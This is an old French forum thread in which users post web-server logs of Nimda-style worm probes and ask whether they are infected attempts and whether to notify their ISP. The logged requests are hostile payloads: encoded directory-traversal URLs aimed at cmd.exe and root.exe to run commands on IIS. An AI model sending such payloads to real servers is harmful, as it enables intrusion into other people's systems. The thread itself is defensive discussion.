C bien une tentative de contamination Nimda ? - Windows & Software
Marsh Posté le 07-05-2002 à 15:19:25
C'est fort possible. Fait une recherche, il y a au moins un autre sujet là-desus dernièrement.
Marsh Posté le 07-05-2002 à 15:27:33
193.252.2.7 et lui la j'en fè quoi je previen wanadoo ou quoi ?
Marsh Posté le 12-05-2002 à 21:14:31
So do I :
#Fields: date time c-ip cs-username s-ip s-port cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
2002-05-12 00:28:54 80.14.229.234 - 80.14.119.57 80 GET /scripts/root.exe /c+dir 401 -
2002-05-12 00:28:55 80.14.229.234 - 80.14.119.57 80 GET /MSADC/root.exe /c+dir 403 -
2002-05-12 00:28:56 80.14.229.234 - 80.14.119.57 80 GET /c/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:57 80.14.229.234 - 80.14.119.57 80 GET /d/winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:58 80.14.229.234 - 80.14.119.57 80 GET /scripts/..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:28:59 80.14.229.234 - 80.14.119.57 80 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:01 80.14.229.234 - 80.14.119.57 80 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:02 80.14.229.234 - 80.14.119.57 80 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe /c+dir 403 -
2002-05-12 00:29:03 80.14.229.234 - 80.14.119.57 80 GET /scripts/..Á../winnt/system32/cmd.exe /c+dir 401 -
2002-05-12 00:29:04 80.14.229.234 - 80.14.119.57 80 GET /scripts/winnt/system32/cmd.exe /c+dir 401 -
etc.... en effet on fait quoi on prévient Wanadoo ???
[jfdsdjhfuetppo]--Message édité par Jef34 le 12-05-2002 à 21:14:52--[/jfdsdjhfuetppo]
Marsh Posté le 12-05-2002 à 21:16:19
Au fait, pour éviter la contamination, que faut-il faire ??? Mis à part Antivurus etc...
[jfdsdjhfuetppo]--Message édité par Jef34 le 13-05-2002 à 09:31:31--[/jfdsdjhfuetppo]
Marsh Posté le 13-05-2002 à 09:49:45
tu fais comme moi Apache + mise a jour
Marsh Posté le 13-05-2002 à 15:52:32
benwar a écrit a écrit : 193.252.2.7 et lui la j'en fè quoi je previen wanadoo ou quoi ? |
le gars en question est contaminé. ce n'est pas un hacker! préviens le si tu veux ou peux. inutile d'avertir abuse...
Marsh Posté le 07-05-2002 à 15:18:13
Dans mes logs apache j'ai ca :
193.252.2.7 - - [06/May/2002:19:53:07 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:19:53:11 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:14 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:15 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:53:16 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:02 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:19:54:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 319
193.252.2.7 - - [06/May/2002:20:19:02 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 317
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:03 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 327
193.252.2.7 - - [06/May/2002:20:19:04 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:05 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 358
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 374
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:06 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:07 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 340
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:08 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 324
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
193.252.2.7 - - [06/May/2002:20:19:09 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 341
C bizard comme requette non ?
---------------
J'avait dit à gauche... François